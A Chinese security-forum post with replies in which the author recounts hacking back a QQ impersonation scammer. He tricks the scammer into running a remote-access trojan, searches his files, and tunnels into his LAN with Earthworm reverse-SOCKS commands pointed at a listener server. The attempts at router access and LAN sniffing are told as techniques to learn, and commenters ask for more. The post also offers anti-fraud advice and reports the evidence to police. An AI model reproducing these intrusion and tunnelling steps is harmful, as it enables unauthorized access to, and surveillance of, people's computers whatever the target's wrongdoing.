用户
搜索
  • TA的每日心情

    2018-3-2 07:59
  • 签到天数: 8 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋-核心白帽

    Rank: 4

    27

    主题

    274

    帖子

    4168

    魔法币
    收听
    0
    粉丝
    133
    注册时间
    2017-4-15

    i春秋认证春秋文阁i春秋签约作者

    发表于 2017-11-19 16:18:43 6679770
    QQ群:i春秋-楚:533191896,欢迎大家加入与我交流。

    犹豫好很久,还是用这个标题吧。为什么要用这个标题? 其实说实话,安全技术只是我业余爱好而已,所以论技术的话,在I春秋里面,我可能只属于【脚本小子】。

    发文章只是分享技术,分享思路,仅此而已。(当然在I春秋投稿有奖励的,哈哈,欢迎各位大表哥投稿。)

    现在这个操蛋的社会,真正愿意无私分享技术的并不多,我也算是看淡了,在这我要感谢i春秋帮助过我的各位表哥,特别要感谢一个人【空格】表哥。

    在我遇到各种困难的时候,空格表哥第一个愿意抽出宝贵时间协助我解决,真的非常感谢。
    好像扯远了,那么我们进入正题吧。


    前段时间,一个陌生人加我办公的QQ,说是我们董事长,并让我转告我们财务加他QQ。
    这种一看就知道是骗子,我不动声色登录了小号,打算套路他一波。

    我小号加上他以后,开始套路。

    1.jpg
    2.jpg


    骗子要求我把余额截图给他。

    3.jpg

    我登录上网上银行,通过审查元素把我的余额 块二毛五 修改成2500多万,然后发给骗子。

    4.jpg

    对方可能看到这么多钱,太过激动,立即要求我汇款到指定账号....哈哈

    5.jpg
    1.jpg


    到一步,我开始思考,钱是肯定不能给他汇的(我没钱,也不傻^_^),那么如何弄到更多证据或者拿到骗子的信息呢?
    一、首先我考虑到骗子登录的IP地址可能进行了伪造,我抓取到他IP可能进行定位的准确度并不高。
    二、如果发文件进行钓鱼的话,担心骗子太奸诈,露馅就不好玩了。
    三、如果一定要发文件进行钓鱼,我想法如下(office最近的0day漏洞,或者快捷方式漏洞,最后再考虑直接发木马。)

    那么我先来试探下,看看对方对网络安全防范意识如何。
    我首先写了个页面,在页面内加入一个CNZZ统计的JS(作用是记录访问者的IP地址)
    然后套路他,引诱对方打开,这样我就可以记录下他IP地址,然后进行定位了。


    7ip钓鱼.jpg

    半分钟后,骗子说打不开,哈哈 你能打开就怪了,因为页面内就一段文字,加上一个统计代码。

    8升级中.jpg
    9.jpg

    我开始登陆cnzz统计后台,大概两分钟后,抓到了骗子的IP地址。

    10ip.jpg

    通过对IP地址进行定位发现 ,精准度非常低,这说明对方的IP地址应该是一个动态IP。

    11定位.jpg

    我用远控生成一个远控木马,诱骗对方说要转账的话,需要他登录我们oa平台,然后进行申请,然而oa平台压根就打不开的,我诱骗他安装这个木马(骗子完全没有安全防范意识),我说只有安装以后才能打开我们oa平台。

    12oa钓鱼.jpg

    半分钟后,骗子说打不开,哈哈,你能打开就真的怪了,因为这压根就是一个远控。

    13打开木马.jpg

    不过我考虑到现在很多人都安装有杀毒软件,因为我这个远控不免杀,肯定会被拦截,我继续诱导他关闭杀毒软件,再次运行木马。
    但是发现我想多了,哈哈,因为我进行控制的服务器已经提示对方上线了。

    14.jpg

    在控制台发现对方已经上线,我已经可以完全控制对方电脑。
    第一个是我本地测试远控是否能正常上线的虚拟机,第二个是骗子的电脑,那么我先来看看这骗子在干嘛。

    15上线.jpg

    终于发现骗子的套路,先通过QQ添加好友,搜索词输入“技术部”,然后挨个添加很多公司的技术部QQ。
    对方通过以后,骗子用某个查询平台,查询对方公司的法人名字,然后冒充对方公司法人进行诈骗。

    16tian.jpg

    诈骗的话语都是一样的套路。

    17.jpg

    看了一下他电脑右下角,吓尿,同时登陆好几个QQ进行诈骗。
    而且压根没装杀毒软件,安全意识还是太低。(难道骗子没有技术团队吗?坏笑中......)

    18多qq.jpg

    我通过远控开始翻他电脑上的文件,看看能不能找到更多证据。
    我在他桌面上发现好多个txt文件,其中一个就有对方发送给我的诈骗卡号。

    2.jpg

    继续翻文件,发现桌面有个文档记录了很多地区的联系人,包括国外的,这应该是个诈骗集团,或者是他上线。
    那么这事就严重了,我收集好各种证据,并通过某位表哥联系江苏当地警方,把线索提交给对方,希望警方能尽快拿下这个诈骗团伙。

    20qq.jpg

    在我提交给警方证据后,我思考,就目前的证据来看,根本无法确定骗子的具体位置。
    所以我打算进入骗子路由器,拿到路由器里面的宽带账号,因为宽带账号现在都是需要身份证和具体地址信息才能办理的。
    那么拿到宽带账号后,只要警方配合当地电信公司查询一下,骗子的具体位置信息就查出来了。

    我通过反弹代理后,成功进入他局域网,进入路由器后并没有发现宽带号。
    用一台服务器监听反弹端口,命令如下:
    Earthworm.exe -s rcsocks -l 1008 -e 888


    在目标上执行
    c:\Earthworm.exe -s rssocks -d 8.8.8.8 -e 888

    其中8.8.8.8是你监听的服务器IP。


    连接成功以后,使用SocksCap64代理本机反弹的端口,即可进入对方局域网。

    具体操作看我这一片文章《从后台弱口令到内网漫游》0x06
    https://bbs.ichunqiu.com/thread-27270-1-1.html

    22路由器.jpg

    经过分析发现,他的wan口是一个局域网IP,然后通过tracert跟踪路由,发现这应该是联通或者移动常用的大局域网结构,或者是无线网卡,连上网络后给你分配一个内网ip地址 。

    想查具体位置还是比较难的,而且这个骗子只是行骗过程使用这台电脑,用完就关机断网,想收集他个人信息基本行是不可能的。


    23.jpg

    因为查到对方局域网还有几台设备,设备名称和骗子这台大致相同,所以判断应该也是PC了,所以打算通过嗅探局域网看看能不能拿到其他电脑上的一些关于骗子的个人信息 。

    那么问题来了,很多嗅探工具都需要安装winpcap环境才能运行,还有的比如cain是需要登录到对方电脑进行可视化嗅探。

    第一点,安装winpcap环境目前很多都是有界面的,不能在命令下安装,找到一个能再命令下安装的,可是还不支持64位(对方是win7 64位系统)

    第二点,如果要远程登录目标上进行安装,那么win7 64位的系统默认是不支持多用户登录的,你这边登录,他那边就弹出来了。
    我找了个支持多用户登录的补丁丢上去,发现还是不行,可是我在本地搭建win7的环境测试的确可以多用户登录的。

    以下是我本地测试打了补丁以后,远程登录后虚拟机并没有弹出来。


    24登录测试.jpg
    25.jpg

    但是在通过反弹登录到目标电脑时,会提醒是否顶掉对方,如果点是的话,对方就会弹出来了。

    26.jpg

    目前也没有好办法能突破,希望有想法的表哥可以给点意见,小弟在此谢谢了。

    总结:
    一、此事希望能给各位朋友一个警示,网上凡是关于现金的信息,一定要打电话和对方确认,避免被骗。
    二、电脑一定要安装杀毒软件,并保持病毒库更新到最新状态。
    三、不管是谁给你发文件,一定要谨慎打开,就算是朋友发来的,你压根不能确定对方的QQ是否已经被盗。
    四、如果被骗,一定要先拨打110报警。

    QQ群:i春秋-楚:533191896,欢迎大家加入与我交流。




    本帖被以下淘专辑推荐:

    ------在下名为菜逼,阁下请多指教。
    ------博客:www.jasonx.cc
    发表于 2017-11-21 01:27:43
    12
    1
    / 2 页下一页
                           
                           
                           
    高级模式 BColorImageLinkQuoteCodeSmilies @朋友 |
    使用道具 举报 回复
    本帖最后由 jasonx 于 2017-11-21 15:57 编辑
    n1ko 发表于 2017-11-21 14:21
    Earthworm工具怎么弄到对方路由器上?

    因为有远控,直接用文件管理功能上传上去,然后在远控里面用命令执行ew反弹到本地,本地监听成功以后,你就相当于进入他内网了,现在只要代理下你反弹回来的端口,在代理软件里面打开浏览器,然后输入路由器地址就进去了。
    ------在下名为菜逼,阁下请多指教。
    ------博客:www.jasonx.cc
    使用道具 举报 回复
    jasonx 发表于 2017-11-21 15:56
    因为有远控,直接用文件管理功能上传上去,然后在远控里面用命令执行ew反弹到本地,本地监听成功以后,你 ...

    我认识这个骗子,之前差评在公众号上发了一个关于吊打这个骗子的文章,头像和套路都是一样的。。。
    使用道具 举报 回复
    手机用户jgTYKx 发表于 2018-5-23 23:49
    我认识这个骗子,之前差评在公众号上发了一个关于吊打这个骗子的文章,头像和套路都是一样的。。。 ...

    如果头像一样的话,可能是转载我的文章哦,因为我在知乎也发布了这个文章,很多人转载了。
    ------在下名为菜逼,阁下请多指教。
    ------博客:www.jasonx.cc
    使用道具 举报 回复
    jasonx 发表于 2017-11-20 20:57
    哥们,说话可是要讲证据的,可否给个原创的地址我看看。

    貌似我以前也看过像表哥这样的文章,都是电信诈骗的。但是想不起在哪看了。。。思路差不多
    使用道具 举报 回复
    jasonx 发表于 2018-7-17 12:12
    如果头像一样的话,可能是转载我的文章哦,因为我在知乎也发布了这个文章,很多人转载了。 ...

    不是哦,文章不是一样的,我对了,但是骗子是同一个
    使用道具 举报 回复
    HuiLang 发表于 2017-11-20 19:40
    你确定原创?  盗用别人的有意思吗

    哥们,说话可是要讲证据的,可否给个原创的地址我看看。
    ------在下名为菜逼,阁下请多指教。
    ------博客:www.jasonx.cc
    使用道具 举报 回复
    发表于 2017-11-21 09:55:20
    主要用的技术分析:1.社会工程学,套路骗子。2.远控,进行控制对方电脑。3.反向代理,进入对方局域网。
    小白~~~
    使用道具 举报 回复
    发表于 2017-11-19 16:40:44
    问下表格用的哪个远控~~
    使用道具 举报 回复
    可以讲下反弹代理吗
    使用道具 举报 回复
    发表于 2017-11-20 06:54:29
    纯白的小白 发表于 2017-11-19 22:31
    可以讲下反弹代理吗

    感谢提醒,我补充下。
    ------在下名为菜逼,阁下请多指教。
    ------博客:www.jasonx.cc
    使用道具 举报 回复
    发表于 2017-11-20 14:05:44
    给力 思路学习了
    使用道具 举报 回复
    发表于 2017-11-20 14:14:14
    膜拜表哥
    使用道具 举报 回复
    发表于 2017-11-20 14:20:13
    学习了
    签名被屏蔽
    使用道具 举报 回复
    发表于 2017-11-20 15:20:14
    66666666666666666666666
    使用道具 举报 回复
    发表于 2017-11-20 15:42:36
    没毛病,学习了
    使用道具 举报 回复
    发表于 2017-11-20 15:51:14
    表哥这波这么溜,你是要闹哪样,是不是表姐逼你的~
    使用道具 举报 回复
    感谢表格分享
    使用道具 举报 回复
    发表于 2017-11-20 18:00:58
    佩服,佩服
    使用道具 举报 回复
    发表于 2017-11-20 18:31:07
    思路很清晰,看完受益良多
    使用道具 举报 回复
    发表于 2017-11-20 18:32:38
    表哥思路666
    使用道具 举报 回复
    发表于 2017-11-20 18:33:38
    表哥思路很清晰,学习了
    使用道具 举报 回复
    12345下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册